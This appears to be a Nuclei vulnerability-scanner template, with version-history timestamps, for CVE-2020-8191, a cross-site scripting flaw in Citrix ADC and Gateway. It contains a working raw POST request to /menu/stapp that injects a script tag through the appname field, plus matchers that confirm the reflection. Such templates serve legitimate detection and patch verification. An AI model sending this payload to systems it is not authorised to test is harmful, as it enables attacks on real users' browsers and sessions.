nuclei-templates/http/cves/2020/CVE-2020-8191.yaml

58 lines
2.1 KiB
YAML
Raw Permalink Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-8191
info:
name: Citrix ADC/Gateway - Cross-Site Scripting
author: dwisiswant0
severity: medium
2021-03-16 15:04:09 +00:00
description: |
Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation: |
Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
reference:
- https://support.citrix.com/article/CTX276688
- https://nvd.nist.gov/vuln/detail/CVE-2020-8191
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/jweny/pocassistdb
- https://github.com/stratosphereips/nist-cve-search-tool
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-8191
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.0021
2024-05-31 19:23:20 +00:00
epss-percentile: 0.58946
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: citrix
product: application_delivery_controller_firmware
tags: cve,cve2020,citrix,xss
http:
- raw:
- |
POST /menu/stapp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
words:
- "</title><script>alert(31337)</script>"
2021-05-05 11:34:46 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: header
2021-05-05 11:34:46 +00:00
words:
- "text/html"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 490a0046304402206617e4956f9404435cacd0175a72eb6deb5b1eead694622dc445086a67a221db022072a353f4336bd25c50f2cafca5951b2056e8b0e4937b2ae92d665df184f60d69:922c64590222798bb761d5b6d8e72950